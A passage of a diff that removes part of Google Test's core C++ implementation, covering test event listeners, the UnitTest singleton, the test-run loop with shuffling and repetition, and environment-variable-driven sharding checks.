-string OsStackTraceGetter::CurrentStackTrace(int /* max_depth */,
-                                             int /* skip_count */)
-    GTEST_LOCK_EXCLUDED_(mutex_) {
-  return "";
-}
-
-void OsStackTraceGetter::UponLeavingGTest()
-    GTEST_LOCK_EXCLUDED_(mutex_) {
-}
-
-const char* const
-OsStackTraceGetter::kElidedFramesMarker =
-    "... " GTEST_NAME_ " internal frames ...";
-
-// A helper class that creates the premature-exit file in its
-// constructor and deletes the file in its destructor.
-class ScopedPrematureExitFile {
- public:
-  explicit ScopedPrematureExitFile(const char* premature_exit_filepath)
-      : premature_exit_filepath_(premature_exit_filepath) {
-    // If a path to the premature-exit file is specified...
-    if (premature_exit_filepath != NULL && *premature_exit_filepath != '\0') {
-      // create the file with a single "0" character in it.  I/O
-      // errors are ignored as there's nothing better we can do and we
-      // don't want to fail the test because of this.
-      FILE* pfile = posix::FOpen(premature_exit_filepath, "w");
-      fwrite("0", 1, 1, pfile);
-      fclose(pfile);
-    }
-  }
-
-  ~ScopedPrematureExitFile() {
-    if (premature_exit_filepath_ != NULL && *premature_exit_filepath_ != '\0') {
-      remove(premature_exit_filepath_);
-    }
-  }
-
- private:
-  const char* const premature_exit_filepath_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ScopedPrematureExitFile);
-};
-
-}  // namespace internal
-
-// class TestEventListeners
-
-TestEventListeners::TestEventListeners()
-    : repeater_(new internal::TestEventRepeater()),
-      default_result_printer_(NULL),
-      default_xml_generator_(NULL) {
-}
-
-TestEventListeners::~TestEventListeners() { delete repeater_; }
-
-// Returns the standard listener responsible for the default console
-// output.  Can be removed from the listeners list to shut down default
-// console output.  Note that removing this object from the listener list
-// with Release transfers its ownership to the user.
-void TestEventListeners::Append(TestEventListener* listener) {
-  repeater_->Append(listener);
-}
-
-// Removes the given event listener from the list and returns it.  It then
-// becomes the caller's responsibility to delete the listener. Returns
-// NULL if the listener is not found in the list.
-TestEventListener* TestEventListeners::Release(TestEventListener* listener) {
-  if (listener == default_result_printer_)
-    default_result_printer_ = NULL;
-  else if (listener == default_xml_generator_)
-    default_xml_generator_ = NULL;
-  return repeater_->Release(listener);
-}
-
-// Returns repeater that broadcasts the TestEventListener events to all
-// subscribers.
-TestEventListener* TestEventListeners::repeater() { return repeater_; }
-
-// Sets the default_result_printer attribute to the provided listener.
-// The listener is also added to the listener list and previous
-// default_result_printer is removed from it and deleted. The listener can
-// also be NULL in which case it will not be added to the list. Does
-// nothing if the previous and the current listener objects are the same.
-void TestEventListeners::SetDefaultResultPrinter(TestEventListener* listener) {
-  if (default_result_printer_ != listener) {
-    // It is an error to pass this method a listener that is already in the
-    // list.
-    delete Release(default_result_printer_);
-    default_result_printer_ = listener;
-    if (listener != NULL)
-      Append(listener);
-  }
-}
-
-// Sets the default_xml_generator attribute to the provided listener.  The
-// listener is also added to the listener list and previous
-// default_xml_generator is removed from it and deleted. The listener can
-// also be NULL in which case it will not be added to the list. Does
-// nothing if the previous and the current listener objects are the same.
-void TestEventListeners::SetDefaultXmlGenerator(TestEventListener* listener) {
-  if (default_xml_generator_ != listener) {
-    // It is an error to pass this method a listener that is already in the
-    // list.
-    delete Release(default_xml_generator_);
-    default_xml_generator_ = listener;
-    if (listener != NULL)
-      Append(listener);
-  }
-}
-
-// Controls whether events will be forwarded by the repeater to the
-// listeners in the list.
-bool TestEventListeners::EventForwardingEnabled() const {
-  return repeater_->forwarding_enabled();
-}
-
-void TestEventListeners::SuppressEventForwarding() {
-  repeater_->set_forwarding_enabled(false);
-}
-
-// class UnitTest
-
-// Gets the singleton UnitTest object.  The first time this method is
-// called, a UnitTest object is constructed and returned.  Consecutive
-// calls will return the same object.
-//
-// We don't protect this under mutex_ as a user is not supposed to
-// call this before main() starts, from which point on the return
-// value will never change.
-UnitTest* UnitTest::GetInstance() {
-  // When compiled with MSVC 7.1 in optimized mode, destroying the
-  // UnitTest object upon exiting the program messes up the exit code,
-  // causing successful tests to appear failed.  We have to use a
-  // different implementation in this case to bypass the compiler bug.
-  // This implementation makes the compiler happy, at the cost of
-  // leaking the UnitTest object.
-
-  // CodeGear C++Builder insists on a public destructor for the
-  // default implementation.  Use this implementation to keep good OO
-  // design with private destructor.
-
-#if (_MSC_VER == 1310 && !defined(_DEBUG)) || defined(__BORLANDC__)
-  static UnitTest* const instance = new UnitTest;
-  return instance;
-#else
-  static UnitTest instance;
-  return &instance;
-#endif  // (_MSC_VER == 1310 && !defined(_DEBUG)) || defined(__BORLANDC__)
-}
-
-// Gets the number of successful test cases.
-int UnitTest::successful_test_case_count() const {
-  return impl()->successful_test_case_count();
-}
-
-// Gets the number of failed test cases.
-int UnitTest::failed_test_case_count() const {
-  return impl()->failed_test_case_count();
-}
-
-// Gets the number of all test cases.
-int UnitTest::total_test_case_count() const {
-  return impl()->total_test_case_count();
-}
-
-// Gets the number of all test cases that contain at least one test
-// that should run.
-int UnitTest::test_case_to_run_count() const {
-  return impl()->test_case_to_run_count();
-}
-
-// Gets the number of successful tests.
-int UnitTest::successful_test_count() const {
-  return impl()->successful_test_count();
-}
-
-// Gets the number of failed tests.
-int UnitTest::failed_test_count() const { return impl()->failed_test_count(); }
-
-// Gets the number of disabled tests that will be reported in the XML report.
-int UnitTest::reportable_disabled_test_count() const {
-  return impl()->reportable_disabled_test_count();
-}
-
-// Gets the number of disabled tests.
-int UnitTest::disabled_test_count() const {
-  return impl()->disabled_test_count();
-}
-
-// Gets the number of tests to be printed in the XML report.
-int UnitTest::reportable_test_count() const {
-  return impl()->reportable_test_count();
-}
-
-// Gets the number of all tests.
-int UnitTest::total_test_count() const { return impl()->total_test_count(); }
-
-// Gets the number of tests that should run.
-int UnitTest::test_to_run_count() const { return impl()->test_to_run_count(); }
-
-// Gets the time of the test program start, in ms from the start of the
-// UNIX epoch.
-internal::TimeInMillis UnitTest::start_timestamp() const {
-    return impl()->start_timestamp();
-}
-
-// Gets the elapsed time, in milliseconds.
-internal::TimeInMillis UnitTest::elapsed_time() const {
-  return impl()->elapsed_time();
-}
-
-// Returns true iff the unit test passed (i.e. all test cases passed).
-bool UnitTest::Passed() const { return impl()->Passed(); }
-
-// Returns true iff the unit test failed (i.e. some test case failed
-// or something outside of all tests failed).
-bool UnitTest::Failed() const { return impl()->Failed(); }
-
-// Gets the i-th test case among all the test cases. i can range from 0 to
-// total_test_case_count() - 1. If i is not in that range, returns NULL.
-const TestCase* UnitTest::GetTestCase(int i) const {
-  return impl()->GetTestCase(i);
-}
-
-// Returns the TestResult containing information on test failures and
-// properties logged outside of individual test cases.
-const TestResult& UnitTest::ad_hoc_test_result() const {
-  return *impl()->ad_hoc_test_result();
-}
-
-// Gets the i-th test case among all the test cases. i can range from 0 to
-// total_test_case_count() - 1. If i is not in that range, returns NULL.
-TestCase* UnitTest::GetMutableTestCase(int i) {
-  return impl()->GetMutableTestCase(i);
-}
-
-// Returns the list of event listeners that can be used to track events
-// inside Google Test.
-TestEventListeners& UnitTest::listeners() {
-  return *impl()->listeners();
-}
-
-// Registers and returns a global test environment.  When a test
-// program is run, all global test environments will be set-up in the
-// order they were registered.  After all tests in the program have
-// finished, all global test environments will be torn-down in the
-// *reverse* order they were registered.
-//
-// The UnitTest object takes ownership of the given environment.
-//
-// We don't protect this under mutex_, as we only support calling it
-// from the main thread.
-Environment* UnitTest::AddEnvironment(Environment* env) {
-  if (env == NULL) {
-    return NULL;
-  }
-
-  impl_->environments().push_back(env);
-  return env;
-}
-
-// Adds a TestPartResult to the current TestResult object.  All Google Test
-// assertion macros (e.g. ASSERT_TRUE, EXPECT_EQ, etc) eventually call
-// this to report their results.  The user code should use the
-// assertion macros instead of calling this directly.
-void UnitTest::AddTestPartResult(
-    TestPartResult::Type result_type,
-    const char* file_name,
-    int line_number,
-    const std::string& message,
-    const std::string& os_stack_trace) GTEST_LOCK_EXCLUDED_(mutex_) {
-  Message msg;
-  msg << message;
-
-  internal::MutexLock lock(&mutex_);
-  if (impl_->gtest_trace_stack().size() > 0) {
-    msg << "\n" << GTEST_NAME_ << " trace:";
-
-    for (int i = static_cast<int>(impl_->gtest_trace_stack().size());
-         i > 0; --i) {
-      const internal::TraceInfo& trace = impl_->gtest_trace_stack()[i - 1];
-      msg << "\n" << internal::FormatFileLocation(trace.file, trace.line)
-          << " " << trace.message;
-    }
-  }
-
-  if (os_stack_trace.c_str() != NULL && !os_stack_trace.empty()) {
-    msg << internal::kStackTraceMarker << os_stack_trace;
-  }
-
-  const TestPartResult result =
-    TestPartResult(result_type, file_name, line_number,
-                   msg.GetString().c_str());
-  impl_->GetTestPartResultReporterForCurrentThread()->
-      ReportTestPartResult(result);
-
-  if (result_type != TestPartResult::kSuccess) {
-    // gtest_break_on_failure takes precedence over
-    // gtest_throw_on_failure.  This allows a user to set the latter
-    // in the code (perhaps in order to use Google Test assertions
-    // with another testing framework) and specify the former on the
-    // command line for debugging.
-    if (GTEST_FLAG(break_on_failure)) {
-#if GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT
-      // Using DebugBreak on Windows allows gtest to still break into a debugger
-      // when a failure happens and both the --gtest_break_on_failure and
-      // the --gtest_catch_exceptions flags are specified.
-      DebugBreak();
-#else
-      // Dereference NULL through a volatile pointer to prevent the compiler
-      // from removing. We use this rather than abort() or __builtin_trap() for
-      // portability: Symbian doesn't implement abort() well, and some debuggers
-      // don't correctly trap abort().
-      *static_cast<volatile int*>(NULL) = 1;
-#endif  // GTEST_OS_WINDOWS
-    } else if (GTEST_FLAG(throw_on_failure)) {
-#if GTEST_HAS_EXCEPTIONS
-      throw internal::GoogleTestFailureException(result);
-#else
-      // We cannot call abort() as it generates a pop-up in debug mode
-      // that cannot be suppressed in VC 7.1 or below.
-      exit(1);
-#endif
-    }
-  }
-}
-
-// Adds a TestProperty to the current TestResult object when invoked from
-// inside a test, to current TestCase's ad_hoc_test_result_ when invoked
-// from SetUpTestCase or TearDownTestCase, or to the global property set
-// when invoked elsewhere.  If the result already contains a property with
-// the same key, the value will be updated.
-void UnitTest::RecordProperty(const std::string& key,
-                              const std::string& value) {
-  impl_->RecordProperty(TestProperty(key, value));
-}
-
-// Runs all tests in this UnitTest object and prints the result.
-// Returns 0 if successful, or 1 otherwise.
-//
-// We don't protect this under mutex_, as we only support calling it
-// from the main thread.
-int UnitTest::Run() {
-  const bool in_death_test_child_process =
-      internal::GTEST_FLAG(internal_run_death_test).length() > 0;
-
-  // Google Test implements this protocol for catching that a test
-  // program exits before returning control to Google Test:
-  //
-  //   1. Upon start, Google Test creates a file whose absolute path
-  //      is specified by the environment variable
-  //      TEST_PREMATURE_EXIT_FILE.
-  //   2. When Google Test has finished its work, it deletes the file.
-  //
-  // This allows a test runner to set TEST_PREMATURE_EXIT_FILE before
-  // running a Google-Test-based test program and check the existence
-  // of the file at the end of the test execution to see if it has
-  // exited prematurely.
-
-  // If we are in the child process of a death test, don't
-  // create/delete the premature exit file, as doing so is unnecessary
-  // and will confuse the parent process.  Otherwise, create/delete
-  // the file upon entering/leaving this function.  If the program
-  // somehow exits before this function has a chance to return, the
-  // premature-exit file will be left undeleted, causing a test runner
-  // that understands the premature-exit-file protocol to report the
-  // test as having failed.
-  const internal::ScopedPrematureExitFile premature_exit_file(
-      in_death_test_child_process ?
-      NULL : internal::posix::GetEnv("TEST_PREMATURE_EXIT_FILE"));
-
-  // Captures the value of GTEST_FLAG(catch_exceptions).  This value will be
-  // used for the duration of the program.
-  impl()->set_catch_exceptions(GTEST_FLAG(catch_exceptions));
-
-#if GTEST_HAS_SEH
-  // Either the user wants Google Test to catch exceptions thrown by the
-  // tests or this is executing in the context of death test child
-  // process. In either case the user does not want to see pop-up dialogs
-  // about crashes - they are expected.
-  if (impl()->catch_exceptions() || in_death_test_child_process) {
-# if !GTEST_OS_WINDOWS_MOBILE && !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT
-    // SetErrorMode doesn't exist on CE.
-    SetErrorMode(SEM_FAILCRITICALERRORS | SEM_NOALIGNMENTFAULTEXCEPT |
-                 SEM_NOGPFAULTERRORBOX | SEM_NOOPENFILEERRORBOX);
-# endif  // !GTEST_OS_WINDOWS_MOBILE
-
-# if (defined(_MSC_VER) || GTEST_OS_WINDOWS_MINGW) && !GTEST_OS_WINDOWS_MOBILE
-    // Death test children can be terminated with _abort().  On Windows,
-    // _abort() can show a dialog with a warning message.  This forces the
-    // abort message to go to stderr instead.
-    _set_error_mode(_OUT_TO_STDERR);
-# endif
-
-# if _MSC_VER >= 1400 && !GTEST_OS_WINDOWS_MOBILE
-    // In the debug version, Visual Studio pops up a separate dialog
-    // offering a choice to debug the aborted program. We need to suppress
-    // this dialog or it will pop up for every EXPECT/ASSERT_DEATH statement
-    // executed. Google Test will notify the user of any unexpected
-    // failure via stderr.
-    //
-    // VC++ doesn't define _set_abort_behavior() prior to the version 8.0.
-    // Users of prior VC versions shall suffer the agony and pain of
-    // clicking through the countless debug dialogs.
-    // TODO(vladl@google.com): find a way to suppress the abort dialog() in the
-    // debug mode when compiled with VC 7.1 or lower.
-    if (!GTEST_FLAG(break_on_failure))
-      _set_abort_behavior(
-          0x0,                                    // Clear the following flags:
-          _WRITE_ABORT_MSG | _CALL_REPORTFAULT);  // pop-up window, core dump.
-# endif
-  }
-#endif  // GTEST_HAS_SEH
-
-  return internal::HandleExceptionsInMethodIfSupported(
-      impl(),
-      &internal::UnitTestImpl::RunAllTests,
-      "auxiliary test code (environments or event listeners)") ? 0 : 1;
-}
-
-// Returns the working directory when the first TEST() or TEST_F() was
-// executed.
-const char* UnitTest::original_working_dir() const {
-  return impl_->original_working_dir_.c_str();
-}
-
-// Returns the TestCase object for the test that's currently running,
-// or NULL if no test is running.
-const TestCase* UnitTest::current_test_case() const
-    GTEST_LOCK_EXCLUDED_(mutex_) {
-  internal::MutexLock lock(&mutex_);
-  return impl_->current_test_case();
-}
-
-// Returns the TestInfo object for the test that's currently running,
-// or NULL if no test is running.
-const TestInfo* UnitTest::current_test_info() const
-    GTEST_LOCK_EXCLUDED_(mutex_) {
-  internal::MutexLock lock(&mutex_);
-  return impl_->current_test_info();
-}
-
-// Returns the random seed used at the start of the current test run.
-int UnitTest::random_seed() const { return impl_->random_seed(); }
-
-#if GTEST_HAS_PARAM_TEST
-// Returns ParameterizedTestCaseRegistry object used to keep track of
-// value-parameterized tests and instantiate and register them.
-internal::ParameterizedTestCaseRegistry&
-    UnitTest::parameterized_test_registry()
-        GTEST_LOCK_EXCLUDED_(mutex_) {
-  return impl_->parameterized_test_registry();
-}
-#endif  // GTEST_HAS_PARAM_TEST
-
-// Creates an empty UnitTest.
-UnitTest::UnitTest() {
-  impl_ = new internal::UnitTestImpl(this);
-}
-
-// Destructor of UnitTest.
-UnitTest::~UnitTest() {
-  delete impl_;
-}
-
-// Pushes a trace defined by SCOPED_TRACE() on to the per-thread
-// Google Test trace stack.
-void UnitTest::PushGTestTrace(const internal::TraceInfo& trace)
-    GTEST_LOCK_EXCLUDED_(mutex_) {
-  internal::MutexLock lock(&mutex_);
-  impl_->gtest_trace_stack().push_back(trace);
-}
-
-// Pops a trace from the per-thread Google Test trace stack.
-void UnitTest::PopGTestTrace()
-    GTEST_LOCK_EXCLUDED_(mutex_) {
-  internal::MutexLock lock(&mutex_);
-  impl_->gtest_trace_stack().pop_back();
-}
-
-namespace internal {
-
-UnitTestImpl::UnitTestImpl(UnitTest* parent)
-    : parent_(parent),
-      GTEST_DISABLE_MSC_WARNINGS_PUSH_(4355 /* using this in initializer */)
-      default_global_test_part_result_reporter_(this),
-      default_per_thread_test_part_result_reporter_(this),
-      GTEST_DISABLE_MSC_WARNINGS_POP_()
-      global_test_part_result_repoter_(
-          &default_global_test_part_result_reporter_),
-      per_thread_test_part_result_reporter_(
-          &default_per_thread_test_part_result_reporter_),
-#if GTEST_HAS_PARAM_TEST
-      parameterized_test_registry_(),
-      parameterized_tests_registered_(false),
-#endif  // GTEST_HAS_PARAM_TEST
-      last_death_test_case_(-1),
-      current_test_case_(NULL),
-      current_test_info_(NULL),
-      ad_hoc_test_result_(),
-      os_stack_trace_getter_(NULL),
-      post_flag_parse_init_performed_(false),
-      random_seed_(0),  // Will be overridden by the flag before first use.
-      random_(0),  // Will be reseeded before first use.
-      start_timestamp_(0),
-      elapsed_time_(0),
-#if GTEST_HAS_DEATH_TEST
-      death_test_factory_(new DefaultDeathTestFactory),
-#endif
-      // Will be overridden by the flag before first use.
-      catch_exceptions_(false) {
-  listeners()->SetDefaultResultPrinter(new PrettyUnitTestResultPrinter);
-}
-
-UnitTestImpl::~UnitTestImpl() {
-  // Deletes every TestCase.
-  ForEach(test_cases_, internal::Delete<TestCase>);
-
-  // Deletes every Environment.
-  ForEach(environments_, internal::Delete<Environment>);
-
-  delete os_stack_trace_getter_;
-}
-
-// Adds a TestProperty to the current TestResult object when invoked in a
-// context of a test, to current test case's ad_hoc_test_result when invoke
-// from SetUpTestCase/TearDownTestCase, or to the global property set
-// otherwise.  If the result already contains a property with the same key,
-// the value will be updated.
-void UnitTestImpl::RecordProperty(const TestProperty& test_property) {
-  std::string xml_element;
-  TestResult* test_result;  // TestResult appropriate for property recording.
-
-  if (current_test_info_ != NULL) {
-    xml_element = "testcase";
-    test_result = &(current_test_info_->result_);
-  } else if (current_test_case_ != NULL) {
-    xml_element = "testsuite";
-    test_result = &(current_test_case_->ad_hoc_test_result_);
-  } else {
-    xml_element = "testsuites";
-    test_result = &ad_hoc_test_result_;
-  }
-  test_result->RecordProperty(xml_element, test_property);
-}
-
-#if GTEST_HAS_DEATH_TEST
-// Disables event forwarding if the control is currently in a death test
-// subprocess. Must not be called before InitGoogleTest.
-void UnitTestImpl::SuppressTestEventsIfInSubprocess() {
-  if (internal_run_death_test_flag_.get() != NULL)
-    listeners()->SuppressEventForwarding();
-}
-#endif  // GTEST_HAS_DEATH_TEST
-
-// Initializes event listeners performing XML output as specified by
-// UnitTestOptions. Must not be called before InitGoogleTest.
-void UnitTestImpl::ConfigureXmlOutput() {
-  const std::string& output_format = UnitTestOptions::GetOutputFormat();
-  if (output_format == "xml") {
-    listeners()->SetDefaultXmlGenerator(new XmlUnitTestResultPrinter(
-        UnitTestOptions::GetAbsolutePathToOutputFile().c_str()));
-  } else if (output_format != "") {
-    printf("WARNING: unrecognized output format \"%s\" ignored.\n",
-           output_format.c_str());
-    fflush(stdout);
-  }
-}
-
-#if GTEST_CAN_STREAM_RESULTS_
-// Initializes event listeners for streaming test results in string form.
-// Must not be called before InitGoogleTest.
-void UnitTestImpl::ConfigureStreamingOutput() {
-  const std::string& target = GTEST_FLAG(stream_result_to);
-  if (!target.empty()) {
-    const size_t pos = target.find(':');
-    if (pos != std::string::npos) {
-      listeners()->Append(new StreamingListener(target.substr(0, pos),
-                                                target.substr(pos+1)));
-    } else {
-      printf("WARNING: unrecognized streaming target \"%s\" ignored.\n",
-             target.c_str());
-      fflush(stdout);
-    }
-  }
-}
-#endif  // GTEST_CAN_STREAM_RESULTS_
-
-// Performs initialization dependent upon flag values obtained in
-// ParseGoogleTestFlagsOnly.  Is called from InitGoogleTest after the call to
-// ParseGoogleTestFlagsOnly.  In case a user neglects to call InitGoogleTest
-// this function is also called from RunAllTests.  Since this function can be
-// called more than once, it has to be idempotent.
-void UnitTestImpl::PostFlagParsingInit() {
-  // Ensures that this function does not execute more than once.
-  if (!post_flag_parse_init_performed_) {
-    post_flag_parse_init_performed_ = true;
-
-#if GTEST_HAS_DEATH_TEST
-    InitDeathTestSubprocessControlInfo();
-    SuppressTestEventsIfInSubprocess();
-#endif  // GTEST_HAS_DEATH_TEST
-
-    // Registers parameterized tests. This makes parameterized tests
-    // available to the UnitTest reflection API without running
-    // RUN_ALL_TESTS.
-    RegisterParameterizedTests();
-
-    // Configures listeners for XML output. This makes it possible for users
-    // to shut down the default XML output before invoking RUN_ALL_TESTS.
-    ConfigureXmlOutput();
-
-#if GTEST_CAN_STREAM_RESULTS_
-    // Configures listeners for streaming test results to the specified server.
-    ConfigureStreamingOutput();
-#endif  // GTEST_CAN_STREAM_RESULTS_
-  }
-}
-
-// A predicate that checks the name of a TestCase against a known
-// value.
-//
-// This is used for implementation of the UnitTest class only.  We put
-// it in the anonymous namespace to prevent polluting the outer
-// namespace.
-//
-// TestCaseNameIs is copyable.
-class TestCaseNameIs {
- public:
-  // Constructor.
-  explicit TestCaseNameIs(const std::string& name)
-      : name_(name) {}
-
-  // Returns true iff the name of test_case matches name_.
-  bool operator()(const TestCase* test_case) const {
-    return test_case != NULL && strcmp(test_case->name(), name_.c_str()) == 0;
-  }
-
- private:
-  std::string name_;
-};
-
-// Finds and returns a TestCase with the given name.  If one doesn't
-// exist, creates one and returns it.  It's the CALLER'S
-// RESPONSIBILITY to ensure that this function is only called WHEN THE
-// TESTS ARE NOT SHUFFLED.
-//
-// Arguments:
-//
-//   test_case_name: name of the test case
-//   type_param:     the name of the test case's type parameter, or NULL if
-//                   this is not a typed or a type-parameterized test case.
-//   set_up_tc:      pointer to the function that sets up the test case
-//   tear_down_tc:   pointer to the function that tears down the test case
-TestCase* UnitTestImpl::GetTestCase(const char* test_case_name,
-                                    const char* type_param,
-                                    Test::SetUpTestCaseFunc set_up_tc,
-                                    Test::TearDownTestCaseFunc tear_down_tc) {
-  // Can we find a TestCase with the given name?
-  const std::vector<TestCase*>::const_iterator test_case =
-      std::find_if(test_cases_.begin(), test_cases_.end(),
-                   TestCaseNameIs(test_case_name));
-
-  if (test_case != test_cases_.end())
-    return *test_case;
-
-  // No.  Let's create one.
-  TestCase* const new_test_case =
-      new TestCase(test_case_name, type_param, set_up_tc, tear_down_tc);
-
-  // Is this a death test case?
-  if (internal::UnitTestOptions::MatchesFilter(test_case_name,
-                                               kDeathTestCaseFilter)) {
-    // Yes.  Inserts the test case after the last death test case
-    // defined so far.  This only works when the test cases haven't
-    // been shuffled.  Otherwise we may end up running a death test
-    // after a non-death test.
-    ++last_death_test_case_;
-    test_cases_.insert(test_cases_.begin() + last_death_test_case_,
-                       new_test_case);
-  } else {
-    // No.  Appends to the end of the list.
-    test_cases_.push_back(new_test_case);
-  }
-
-  test_case_indices_.push_back(static_cast<int>(test_case_indices_.size()));
-  return new_test_case;
-}
-
-// Helpers for setting up / tearing down the given environment.  They
-// are for use in the ForEach() function.
-static void SetUpEnvironment(Environment* env) { env->SetUp(); }
-static void TearDownEnvironment(Environment* env) { env->TearDown(); }
-
-// Runs all tests in this UnitTest object, prints the result, and
-// returns true if all tests are successful.  If any exception is
-// thrown during a test, the test is considered to be failed, but the
-// rest of the tests will still be run.
-//
-// When parameterized tests are enabled, it expands and registers
-// parameterized tests first in RegisterParameterizedTests().
-// All other functions called from RunAllTests() may safely assume that
-// parameterized tests are ready to be counted and run.
-bool UnitTestImpl::RunAllTests() {
-  // Makes sure InitGoogleTest() was called.
-  if (!GTestIsInitialized()) {
-    printf("%s",
-           "\nThis test program did NOT call ::testing::InitGoogleTest "
-           "before calling RUN_ALL_TESTS().  Please fix it.\n");
-    return false;
-  }
-
-  // Do not run any test if the --help flag was specified.
-  if (g_help_flag)
-    return true;
-
-  // Repeats the call to the post-flag parsing initialization in case the
-  // user didn't call InitGoogleTest.
-  PostFlagParsingInit();
-
-  // Even if sharding is not on, test runners may want to use the
-  // GTEST_SHARD_STATUS_FILE to query whether the test supports the sharding
-  // protocol.
-  internal::WriteToShardStatusFileIfNeeded();
-
-  // True iff we are in a subprocess for running a thread-safe-style
-  // death test.
-  bool in_subprocess_for_death_test = false;
-
-#if GTEST_HAS_DEATH_TEST
-  in_subprocess_for_death_test = (internal_run_death_test_flag_.get() != NULL);
-#endif  // GTEST_HAS_DEATH_TEST
-
-  const bool should_shard = ShouldShard(kTestTotalShards, kTestShardIndex,
-                                        in_subprocess_for_death_test);
-
-  // Compares the full test names with the filter to decide which
-  // tests to run.
-  const bool has_tests_to_run = FilterTests(should_shard
-                                              ? HONOR_SHARDING_PROTOCOL
-                                              : IGNORE_SHARDING_PROTOCOL) > 0;
-
-  // Lists the tests and exits if the --gtest_list_tests flag was specified.
-  if (GTEST_FLAG(list_tests)) {
-    // This must be called *after* FilterTests() has been called.
-    ListTestsMatchingFilter();
-    return true;
-  }
-
-  random_seed_ = GTEST_FLAG(shuffle) ?
-      GetRandomSeedFromFlag(GTEST_FLAG(random_seed)) : 0;
-
-  // True iff at least one test has failed.
-  bool failed = false;
-
-  TestEventListener* repeater = listeners()->repeater();
-
-  start_timestamp_ = GetTimeInMillis();
-  repeater->OnTestProgramStart(*parent_);
-
-  // How many times to repeat the tests?  We don't want to repeat them
-  // when we are inside the subprocess of a death test.
-  const int repeat = in_subprocess_for_death_test ? 1 : GTEST_FLAG(repeat);
-  // Repeats forever if the repeat count is negative.
-  const bool forever = repeat < 0;
-  for (int i = 0; forever || i != repeat; i++) {
-    // We want to preserve failures generated by ad-hoc test
-    // assertions executed before RUN_ALL_TESTS().
-    ClearNonAdHocTestResult();
-
-    const TimeInMillis start = GetTimeInMillis();
-
-    // Shuffles test cases and tests if requested.
-    if (has_tests_to_run && GTEST_FLAG(shuffle)) {
-      random()->Reseed(random_seed_);
-      // This should be done before calling OnTestIterationStart(),
-      // such that a test event listener can see the actual test order
-      // in the event.
-      ShuffleTests();
-    }
-
-    // Tells the unit test event listeners that the tests are about to start.
-    repeater->OnTestIterationStart(*parent_, i);
-
-    // Runs each test case if there is at least one test to run.
-    if (has_tests_to_run) {
-      // Sets up all environments beforehand.
-      repeater->OnEnvironmentsSetUpStart(*parent_);
-      ForEach(environments_, SetUpEnvironment);
-      repeater->OnEnvironmentsSetUpEnd(*parent_);
-
-      // Runs the tests only if there was no fatal failure during global
-      // set-up.
-      if (!Test::HasFatalFailure()) {
-        for (int test_index = 0; test_index < total_test_case_count();
-             test_index++) {
-          GetMutableTestCase(test_index)->Run();
-        }
-      }
-
-      // Tears down all environments in reverse order afterwards.
-      repeater->OnEnvironmentsTearDownStart(*parent_);
-      std::for_each(environments_.rbegin(), environments_.rend(),
-                    TearDownEnvironment);
-      repeater->OnEnvironmentsTearDownEnd(*parent_);
-    }
-
-    elapsed_time_ = GetTimeInMillis() - start;
-
-    // Tells the unit test event listener that the tests have just finished.
-    repeater->OnTestIterationEnd(*parent_, i);
-
-    // Gets the result and clears it.
-    if (!Passed()) {
-      failed = true;
-    }
-
-    // Restores the original test order after the iteration.  This
-    // allows the user to quickly repro a failure that happens in the
-    // N-th iteration without repeating the first (N - 1) iterations.
-    // This is not enclosed in "if (GTEST_FLAG(shuffle)) { ... }", in
-    // case the user somehow changes the value of the flag somewhere
-    // (it's always safe to unshuffle the tests).
-    UnshuffleTests();
-
-    if (GTEST_FLAG(shuffle)) {
-      // Picks a new random seed for each iteration.
-      random_seed_ = GetNextRandomSeed(random_seed_);
-    }
-  }
-
-  repeater->OnTestProgramEnd(*parent_);
-
-  return !failed;
-}
-
-// Reads the GTEST_SHARD_STATUS_FILE environment variable, and creates the file
-// if the variable is present. If a file already exists at this location, this
-// function will write over it. If the variable is present, but the file cannot
-// be created, prints an error and exits.
-void WriteToShardStatusFileIfNeeded() {
-  const char* const test_shard_file = posix::GetEnv(kTestShardStatusFile);
-  if (test_shard_file != NULL) {
-    FILE* const file = posix::FOpen(test_shard_file, "w");
-    if (file == NULL) {
-      ColoredPrintf(COLOR_RED,
-                    "Could not write to the test shard status file \"%s\" "
-                    "specified by the %s environment variable.\n",
-                    test_shard_file, kTestShardStatusFile);
-      fflush(stdout);
-      exit(EXIT_FAILURE);
-    }
-    fclose(file);
-  }
-}
-
-// Checks whether sharding is enabled by examining the relevant
-// environment variable values. If the variables are present,
-// but inconsistent (i.e., shard_index >= total_shards), prints
-// an error and exits. If in_subprocess_for_death_test, sharding is
-// disabled because it must only be applied to the original test
-// process. Otherwise, we could filter out death tests we intended to execute.
-bool ShouldShard(const char* total_shards_env,
-                 const char* shard_index_env,
-                 bool in_subprocess_for_death_test) {
-  if (in_subprocess_for_death_test) {
-    return false;
-  }
-
-  const Int32 total_shards = Int32FromEnvOrDie(total_shards_env, -1);
-  const Int32 shard_index = Int32FromEnvOrDie(shard_index_env, -1);
-
-  if (total_shards == -1 && shard_index == -1) {
-    return false;
-  } else if (total_shards == -1 && shard_index != -1) {
-    const Message msg = Message()
-      << "Invalid environment variables: you have "
-      << kTestShardIndex << " = " << shard_index
-      << ", but have left " << kTestTotalShards << " unset.\n";
-    ColoredPrintf(COLOR_RED, msg.GetString().c_str());
-    fflush(stdout);
-    exit(EXIT_FAILURE);
-  } else if (total_shards != -1 && shard_index == -1) {
-    const Message msg = Message()
-      << "Invalid environment variables: you have "
-      << kTestTotalShards << " = " << total_shards
-      << ", but have left " << kTestShardIndex << " unset.\n";
-    ColoredPrintf(COLOR_RED, msg.GetString().c_str());
-    fflush(stdout);
-    exit(EXIT_FAILURE);
-  } else if (shard_index < 0 || shard_index >= total_shards) {
-    const Message msg = Message()
-      << "Invalid environment variables: we require 0 <= "
-      << kTestShardIndex << " < " << kTestTotalShards
-      << ", but you have " << kTestShardIndex << "=" << shard_index
-      << ", " << kTestTotalShards << "=" << total_shards << ".\n";
-    ColoredPrintf(COLOR_RED, msg.GetString().c_str());
-    fflush(stdout);
-    exit(EXIT_FAILURE);
-  }
-
-  return total_shards > 1;
-}
-
-// Parses the environment variable var as an Int32. If it is unset,
-// returns default_val. If it is not an Int32, prints an error
-// and aborts.
-Int32 Int32FromEnvOrDie(const char* var, Int32 default_val) {
-  const char* str_val = posix::GetEnv(var);
-  if (str_val == NULL) {
-    return default_val;
-  }
-
-  Int32 result;
-  if (!ParseInt32(Message() << "The value of environment variable " << var,
-                  str_val, &result)) {
-    exit(EXIT_FAILURE);
-  }
-  return result;
-}
